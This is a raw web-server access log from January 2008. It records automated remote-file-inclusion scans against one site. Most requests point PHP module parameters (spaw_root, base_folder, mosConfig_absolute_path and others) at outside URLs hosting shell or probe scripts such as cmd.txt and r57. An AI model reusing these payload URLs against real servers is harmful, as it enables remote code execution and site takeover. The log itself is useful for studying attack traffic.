70.85.167.242 - - [30/Jan/2008:06:33:17 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://sofularciftligi.com/forum/avatars/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.167.242 - - [30/Jan/2008:06:33:17 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://sofularciftligi.com/forum/avatars/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.61.24.106 - - [30/Jan/2008:06:34:12 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.nzvikings.dk/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.200.255.149 - - [30/Jan/2008:06:34:16 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.nzvikings.dk/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.145.150.11 - - [30/Jan/2008:06:34:53 -0800] "GET /logs/access_071225.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.220.191.9 - - [30/Jan/2008:06:34:54 -0800] "GET /index.php?s=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.18.66 - - [30/Jan/2008:06:35:22 -0800] "GET /logs/access_071202.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://sofularciftligi.com/forum/avatars/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.54.178.146 - - [30/Jan/2008:06:36:22 -0800] "GET /logs/access.log/modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.54.178.146 - - [30/Jan/2008:06:36:24 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.54.178.146 - - [30/Jan/2008:06:36:25 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.129.16.106 - - [30/Jan/2008:06:37:19 -0800] "GET /logs/access_071230.log/index.php?option=com_cropimage&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2008/1/21/1711593/temp/echox? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.129.16.106 - - [30/Jan/2008:06:37:19 -0800] "GET /logs/index.php?option=com_cropimage&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2008/1/21/1711593/temp/echox? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.16.204.162 - - [30/Jan/2008:06:37:21 -0800] "GET /logs/access.log//modules/Neos_Chronos/header.php?base_folder=http://www.nzvikings.dk/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.16.204.162 - - [30/Jan/2008:06:37:53 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.nzvikings.dk/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.255.149 - - [30/Jan/2008:06:38:17 -0800] "GET /logs/access.log//modules/Neos_Chronos/header.php?base_folder=http://www.nzvikings.dk/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.255.149 - - [30/Jan/2008:06:38:17 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.nzvikings.dk/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.255.149 - - [30/Jan/2008:06:38:17 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.nzvikings.dk/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.201.40.74 - - [30/Jan/2008:06:39:03 -0800] "GET /logs/access_071225.log//hysteresis//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.175.238.135 - - [30/Jan/2008:06:39:04 -0800] "GET /logs/access_071229.log HTTP/1.1" 200 262144 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)" "www.dmulk.com"
201.201.40.74 - - [30/Jan/2008:06:39:05 -0800] "GET //hysteresis//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.201.40.74 - - [30/Jan/2008:06:39:07 -0800] "GET /logs//hysteresis//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.201.40.74 - - [30/Jan/2008:06:39:10 -0800] "GET /logs/access_071225.log///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.201.40.74 - - [30/Jan/2008:06:39:10 -0800] "GET ///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.200.255.149 - - [30/Jan/2008:06:39:32 -0800] "GET /logs/access_071220.log//modules/Neos_Chronos/header.php?base_folder=http://www.nzvikings.dk/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
124.32.128.178 - - [30/Jan/2008:06:41:59 -0800] "GET /logs/access_071229.log/index.php?s=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
124.32.128.178 - - [30/Jan/2008:06:41:59 -0800] "GET /logs/index.php?s=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.54.178.146 - - [30/Jan/2008:06:42:52 -0800] "GET /logs/access_071220.log/modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.172.55.178 - - [30/Jan/2008:06:43:30 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://avvv.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.16.204.162 - - [30/Jan/2008:06:43:56 -0800] "GET /logs/access_071220.log//modules/Neos_Chronos/header.php?base_folder=http://www.nzvikings.dk/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.61.24.106 - - [30/Jan/2008:06:44:01 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.nzvikings.dk/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.61.24.106 - - [30/Jan/2008:06:44:01 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.nzvikings.dk/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.20.144 - - [30/Jan/2008:06:44:10 -0800] "GET /?S=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
208.201.254.10 - - [30/Jan/2008:06:44:14 -0800] "GET //adminfoot.php?path[docroot]=http://www.moskaworned.xpg.com.br/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.77.182.148 - - [30/Jan/2008:06:44:36 -0800] "GET /impex/ImpExData.php?systempath=http://bxsafe.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
222.77.182.148 - - [30/Jan/2008:06:44:36 -0800] "GET /logs/impex/ImpExData.php?systempath=http://bxsafe.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
69.22.162.60 - - [30/Jan/2008:06:46:44 -0800] "GET /logs/access_080106.log//AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.22.162.60 - - [30/Jan/2008:06:46:44 -0800] "GET //AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.22.162.60 - - [30/Jan/2008:06:46:44 -0800] "GET /logs//AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.201.254.10 - - [30/Jan/2008:06:46:50 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.16.204.162 - - [30/Jan/2008:06:47:42 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.nzvikings.dk/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.248.130 - - [30/Jan/2008:06:48:31 -0800] "GET /?mosConfig_absolute_path=http://blueislandestates.com/Pics/mlr.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
200.54.178.146 - - [30/Jan/2008:06:49:41 -0800] "GET /logs/access_071229.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.230.23.104 - - [30/Jan/2008:06:50:30 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.23.104 - - [30/Jan/2008:06:50:31 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.63.132.57 - - [30/Jan/2008:06:50:51 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.anamer.com/esupportv2.2.opened.ioncube/upload_ioncube/admin/.r/vampire.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.230.23.104 - - [30/Jan/2008:06:51:00 -0800] "GET /logs/access_071219.log//modules/vwar/admin/admin.php?vwar_root=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.151.162.98 - - [30/Jan/2008:06:51:13 -0800] "GET /logs/access_071229.log/index.php?s=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.151.162.98 - - [30/Jan/2008:06:51:13 -0800] "GET /logs/index.php?s=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.164.178 - - [30/Jan/2008:06:51:44 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.financejobdirectory.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.186.67.4 - - [30/Jan/2008:06:52:30 -0800] "GET /logs/access.log/modules/Neos_Chronos/header.php?base_folder=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.186.67.4 - - [30/Jan/2008:06:52:30 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.186.67.4 - - [30/Jan/2008:06:52:31 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.186.67.4 - - [30/Jan/2008:06:53:39 -0800] "GET /logs/access_071220.log/modules/Neos_Chronos/header.php?base_folder=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.3.2.8 - - [30/Jan/2008:06:56:41 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.3.2.8 - - [30/Jan/2008:06:56:41 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.34.73 - - [30/Jan/2008:06:57:06 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://geocities.com/ini_prast/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.10.80 - - [30/Jan/2008:06:58:00 -0800] "GET /logs/access_071230.log//?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.10.80 - - [30/Jan/2008:06:58:01 -0800] "GET //?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.10.80 - - [30/Jan/2008:06:58:01 -0800] "GET /logs//?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 200 32403 "-" "libwww-perl/5.808" "www.dmulk.com"
202.124.242.154 - - [30/Jan/2008:06:59:24 -0800] "GET /logs/access_071225.log//pandadir/modules/My_eGallery/public/displayCategory.php?adminpath=http://geocities.com/carneline0817/kontol/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.124.242.154 - - [30/Jan/2008:06:59:24 -0800] "GET //pandadir/modules/My_eGallery/public/displayCategory.php?adminpath=http://geocities.com/carneline0817/kontol/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.124.242.154 - - [30/Jan/2008:06:59:24 -0800] "GET /logs//pandadir/modules/My_eGallery/public/displayCategory.php?adminpath=http://geocities.com/carneline0817/kontol/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.124.242.154 - - [30/Jan/2008:06:59:26 -0800] "GET /logs/access_071225.log//pandadir/modules/My_eGallery/public/displayCategory.php?adminpath=http://handaeng.com/dave/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.124.242.154 - - [30/Jan/2008:06:59:26 -0800] "GET //pandadir/modules/My_eGallery/public/displayCategory.php?adminpath=http://handaeng.com/dave/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.124.242.154 - - [30/Jan/2008:06:59:26 -0800] "GET /logs//pandadir/modules/My_eGallery/public/displayCategory.php?adminpath=http://handaeng.com/dave/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
221.121.107.7 - - [30/Jan/2008:06:59:42 -0800] "GET /logs/access_071225.log//skin/zero_vote/error.php?dir=http://h1.ripway.com/renatas2/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.121.107.7 - - [30/Jan/2008:06:59:42 -0800] "GET //skin/zero_vote/error.php?dir=http://h1.ripway.com/renatas2/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.121.107.7 - - [30/Jan/2008:06:59:43 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://h1.ripway.com/renatas2/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.55.164.178 - - [30/Jan/2008:07:00:48 -0800] "GET /logs//index.php?option=com_rsgallery&page=inline&catid=http://gamezspace.net/images/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
72.55.164.178 - - [30/Jan/2008:07:00:48 -0800] "GET //index.php?option=com_rsgallery&page=inline&catid=http://gamezspace.net/images/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
66.249.70.19 - - [30/Jan/2008:07:00:53 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.19 - - [30/Jan/2008:07:00:53 -0800] "GET /logs/access_070723.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
87.117.248.130 - - [30/Jan/2008:07:02:03 -0800] "GET /logs/access_071230.log/?mosConfig_absolute_path=http://blueislandestates.com/Pics/mlr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.248.130 - - [30/Jan/2008:07:02:04 -0800] "GET /logs/?mosConfig_absolute_path=http://blueislandestates.com/Pics/mlr.txt? HTTP/1.1" 200 32398 "-" "libwww-perl/5.808" "www.dmulk.com"
66.246.252.43 - - [30/Jan/2008:07:02:22 -0800] "GET /logs/access_071225.log/index.php?pag=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.246.252.43 - - [30/Jan/2008:07:02:22 -0800] "GET /index.php?pag=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.246.252.43 - - [30/Jan/2008:07:02:22 -0800] "GET /logs/index.php?pag=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.164.178 - - [30/Jan/2008:07:02:56 -0800] "GET /logs/access.log/modules/Neos_Chronos/header.php?base_folder=http://www.financejobdirectory.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.164.178 - - [30/Jan/2008:07:02:56 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.financejobdirectory.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.168.64.10 - - [30/Jan/2008:07:03:25 -0800] "GET /logs/access_071225.log/index.php?pag=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.168.64.10 - - [30/Jan/2008:07:03:25 -0800] "GET /index.php?pag=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.168.64.10 - - [30/Jan/2008:07:03:26 -0800] "GET /logs/index.php?pag=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.38.10.80 - - [30/Jan/2008:07:04:03 -0800] "GET /logs/access.log//?displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.10.80 - - [30/Jan/2008:07:04:03 -0800] "GET //?displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.10.80 - - [30/Jan/2008:07:04:03 -0800] "GET /logs//?displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 200 32403 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.164.178 - - [30/Jan/2008:07:05:23 -0800] "GET /logs/access_071220.log/modules/Neos_Chronos/header.php?base_folder=http://www.financejobdirectory.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.16.251.245 - - [30/Jan/2008:07:05:48 -0800] "GET /bbs/skin/zero_vote/setup.php?dir=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.16.251.245 - - [30/Jan/2008:07:05:48 -0800] "GET /bbs/skin/zero_vote/setup.php?dir=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.212.28.43 - - [30/Jan/2008:07:05:50 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.shaunabanks.com/ct/includes/gif2png/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
66.212.28.43 - - [30/Jan/2008:07:05:50 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.shaunabanks.com/ct/includes/gif2png/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
207.42.174.26 - - [30/Jan/2008:07:06:01 -0800] "GET /logs/oneadmin/config.php?path[docroot]=http://menlowstation.net/images/r57? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
221.121.107.7 - - [30/Jan/2008:07:06:42 -0800] "GET /logs/access_071229.log//skin/zero_vote/error.php?dir=http://h1.ripway.com/renatas2/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.38.10.80 - - [30/Jan/2008:07:06:46 -0800] "GET /logs/access_071231.log//?displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.164.178 - - [30/Jan/2008:07:07:45 -0800] "GET /logs/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://gamezspace.net/images/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
72.55.164.178 - - [30/Jan/2008:07:07:45 -0800] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://gamezspace.net/images/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
193.254.241.12 - - [30/Jan/2008:07:09:17 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
193.254.241.12 - - [30/Jan/2008:07:09:17 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
208.201.254.10 - - [30/Jan/2008:07:10:47 -0800] "GET /logs/access_071225.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.201.254.10 - - [30/Jan/2008:07:10:47 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.10.80 - - [30/Jan/2008:07:11:01 -0800] "GET /logs/access_071225.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.10.80 - - [30/Jan/2008:07:11:01 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.10.80 - - [30/Jan/2008:07:11:01 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.10.80 - - [30/Jan/2008:07:11:06 -0800] "GET /logs/access_071228.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.13.86.10 - - [30/Jan/2008:07:11:36 -0800] "GET /logs/access_080106.log//modules/vwar/admin/admin.php?vwar_root=add%20this? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.13.86.10 - - [30/Jan/2008:07:11:36 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=add%20this? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.13.86.10 - - [30/Jan/2008:07:11:36 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=add%20this? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.13.86.10 - - [30/Jan/2008:07:11:47 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=add%20this? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.148.126.98 - - [30/Jan/2008:07:12:45 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://guido93hack.altervista.org/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.186.67.4 - - [30/Jan/2008:07:12:52 -0800] "GET /logs/access_071225.log/include/inc_ext/spaw/dialogs/confirm.php?spaw_root=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.186.67.4 - - [30/Jan/2008:07:12:52 -0800] "GET /include/inc_ext/spaw/dialogs/confirm.php?spaw_root=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.186.67.4 - - [30/Jan/2008:07:12:52 -0800] "GET /logs/include/inc_ext/spaw/dialogs/confirm.php?spaw_root=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.70.19 - - [30/Jan/2008:07:13:05 -0800] "GET / HTTP/1.1" 200 2962 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
